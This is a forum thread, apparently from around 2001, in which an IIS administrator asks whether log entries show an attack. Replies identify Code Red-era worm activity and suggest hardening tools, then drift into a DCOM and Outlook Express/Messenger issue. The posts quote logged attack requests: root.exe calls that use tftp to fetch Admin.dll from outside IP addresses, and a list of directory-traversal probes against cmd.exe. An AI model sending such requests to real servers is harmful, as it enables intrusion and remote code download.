[Mugen C]

Hi There, just need some confirmations from you guys....when I was checking my Event logs this morning...I found the following items inside my system log:

alert #1 source: DCOM

DCOM got error "Logon failure: unknown user name or bad password. " and was unable to logon MyDomain\Administrator in order to run the server:
{90A5EBFD-60BD-11D3-8164-204C4F4F5020}


alert #2 Source: W3SVC

The script started from the URL '/MSADC/root.exe' with parameters

'/c+tftp%20-i%20207.164.214.66%20GET%20Admin.dll%20Admin.dll' has not responded within the

configured timeout period. The HTTP server is terminating the script.
For additional information specific to this message please visit the Microsoft Online

Support site located at: http://www.microsoft.com/contentredirect.asp.


alert #3 source: W3SVC

The script started from the URL '/MSADC/root.exe' with parameters

'/c+tftp%20-i%20207.91.104.246%20GET%20Admin.dll%20Admin.dll' has not responded within the

configured timeout period. The HTTP server is terminating the script.
For additional information specific to this message please visit the Microsoft Online

Support site located at: http://www.microsoft.com/contentredirect.asp.

Is that true that someone was trying to compromise my server? Was he successful or I am going to be fine? Thanks and look forward to hear from you all! If you need more info. please let me know, Thanks!

regards,
Mugen C

[clutch]

While it looks like someone might be trying to get something not normally asked for, I am not familiar with that exploit. If you would like to be rid of the vast majority of crap from these simple but effective attacks, check out this tool:

http://support.microsoft.com/support/kb/articles/q307/6/08.asp

It's URLScan, and would have dropped those requests immediately if configured to do so (which it would by default, I believe). There is another tool here:

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/locktool.asp

and while it works well, it broke my use of OWA (Outlook Web Access) and I wound up removing it. It's a bit more powerful, and is based on the idea of how to deal with a situation if you are compromised vs. the other tool which blocks intended compromising attacks.

There is also the high security web template, and has worked against Code Red and other attacks as well, but is almost non-existant in the installed base of IIS servers on the 'net. You can find the template here:

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/iis/tips/iis5chk.asp

down toward the middle. By the way, that page is also the security checklist for IIS5, and is full of useful information.

Hope this helps.

[Bursar]

The attacks you list are part of Code Red. We have dozens of these in our event logs on our NT4 and 2000 IIS servers.

You can get a Code Red removal tool from Symantec which will remove the files and do a basic test to see if that machine is at risk.

[clutch]

Cool. I haven't seen entries like that in my event logs (probably due to the lockdown tools), but I do see the attacks via my IIS logs like so:

65.29.76.242 - 10/15/2001 10:49:09 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%252f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:08 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:07 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /MSADC/root.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /c/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /d/winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /scripts/..%255c../winnt/system32/cmd.exe?/c+dir -
Info 65.29.76.242 - 10/15/2001 10:49:06 AM W3SVC3 SERVER-1 192.168.1.200 404 - /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir

That is one attack cycle, and I track these via an ASP app (which this was copied from) that queries my SQL logs DB. I am up to 900 hits today as of this post since midnight.

[Jerry Atrik]

i just astarted to get that dcom error at home.
it only happens when i open outlook express.
seems that msmessenger is also trying to open but since i never set it up (i removed it actually) the thing times out
now my outlook express takes a long time to open

this only happened since xp sp1

[clutch]

If there's a delay opening Outlook Express, then it might be the same issue that affects Outlook. In Outlook, you can disable its ability to launch MS Messenger from within Tools>Options>Other. You might have something similar in OE.

[Jerry Atrik]

check this out. i will have to say this is a dirty trick from ms

if i allow messenger in the group policy then oe opens instantly.
and messenger also opens, even though i removed it from windows components

if i disable access to messenger then i get the dcom error in the sys events and oe opens really slow

this is a new thing in sp1
im scanning the registry

[clutch]

I thought that SP1 reinstalls MSMessenger if it wasn't there. Hence your seeing it now. The delay behavior is consistent with Outlook when it is setup to launch MSMessenger and it isn't able to.

[Jerry Atrik]

i removed messenger from the windows components and set
use my current instant messaging service
in the new window sp1 has to comply with the feds
viola' no more messenger when i boot

then i open oe and BAM!! there it is.
if i disable access thru group policy then i get the delay but no messenger.

seems that outlook express opens messenger even if it's uninstalled and the only way to get rid of it is to deny access thru gpedit, but the service still trys to connect which is the cause of the "dcom" error.

i really like ms but man that goes a little overboard.

[clutch]

Right, so you have to look for a way to tell OE not to launch MSMessenger anymore.

[Jerry Atrik]

absolutely
so far im stumped (course im sposed to be working right now)

there were a couple of posts at this site telling of slow oe

[Bart Jonkman]

I suggest you visit http://wwwmonitortools.com/cat_web/, they have plenty of tools listed to verify if your IIS server is patched well.

Regards,

Bart.